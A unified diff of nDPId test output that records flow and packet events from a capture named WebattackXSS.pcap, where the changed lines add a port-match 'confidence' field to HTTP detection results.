 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3890,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":2,"flow_last_seen":1499347433753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347433753,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ3zgqPCDhHraKgKAScSBXTwAAAgQFtAQCCAoD5ICHATqvEgEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3891,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_packet_id":3,"flow_last_seen":1499347433754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347433754,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JW5AAD4GoGqsEAABwKgKMt84AFAetoqAKjwg4oAQAOX2VgAAAQEICgE6rxID5ICH"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347305402,"flow_last_seen":1499347310703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347305402,"flow_last_seen":1499347310703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347305402,"flow_last_seen":1499347310703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347306680,"flow_last_seen":1499347311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347306680,"flow_last_seen":1499347311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347306680,"flow_last_seen":1499347311703,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55794,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347309314,"flow_last_seen":1499347314704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347309314,"flow_last_seen":1499347314704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347309314,"flow_last_seen":1499347314704,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55820,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347310567,"flow_last_seen":1499347315705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347310567,"flow_last_seen":1499347315705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347310567,"flow_last_seen":1499347315705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347313106,"flow_last_seen":1499347318705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347313106,"flow_last_seen":1499347318705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347313106,"flow_last_seen":1499347318705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347314358,"flow_last_seen":1499347319705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347314358,"flow_last_seen":1499347319705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3901,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347314358,"flow_last_seen":1499347319705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436039,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347436274,"flow_last_seen":1499347436274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347436274,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3904,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_packet_id":1,"flow_last_seen":1499347436274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347436274,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W69AAD4GaiGsEAABwKgKMt9SAFA\/BeonAAAAAKACchCjcQAAAgQFtAQCCAoBOrGIAAAAAAEDAwc="}
@@ -1526,17 +1526,17 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3977,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":1,"flow_last_seen":1499347445158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347445158,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/otAAD4Gx0SsEAABwKgKMt+wAFCaOES+AAAAAKACchDknAAAAgQFtAQCCAoBOro1AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":2,"flow_last_seen":1499347445158,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347445158,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ37CiJaNtmjhEv6AScSAQWQAAAgQFtAQCCAoD5IurATq6NQEDAwc="}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3979,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":280,"flow_packet_id":3,"flow_last_seen":1499347445159,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347445159,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/oxAAD4Gx0usEAABwKgKMt+wAFCaOES\/oiWjboAQAOWvYAAAAQEICgE6ujUD5Iur"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347315631,"flow_last_seen":1499347320705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347315631,"flow_last_seen":1499347320705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347315631,"flow_last_seen":1499347320705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347318180,"flow_last_seen":1499347323705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347318180,"flow_last_seen":1499347323705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347318180,"flow_last_seen":1499347323705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347319466,"flow_last_seen":1499347324705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347319466,"flow_last_seen":1499347324705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347319466,"flow_last_seen":1499347324705,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347320712,"flow_last_seen":1499347326706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347320712,"flow_last_seen":1499347326706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347320712,"flow_last_seen":1499347326706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347323234,"flow_last_seen":1499347328706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347323234,"flow_last_seen":1499347328706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347323234,"flow_last_seen":1499347328706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347324538,"flow_last_seen":1499347329706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347324538,"flow_last_seen":1499347329706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3986,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347324538,"flow_last_seen":1499347329706,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446181,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55982,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347446419,"flow_last_seen":1499347446419,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347446419,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3989,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":281,"flow_packet_id":1,"flow_last_seen":1499347446419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347446419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oGtAAD4GJWWsEAABwKgKMt++AFBFYxsbAAAAAKACchBhzAAAAgQFtAQCCAoBOrtwAAAAAAEDAwc="}
@@ -1562,17 +1562,17 @@
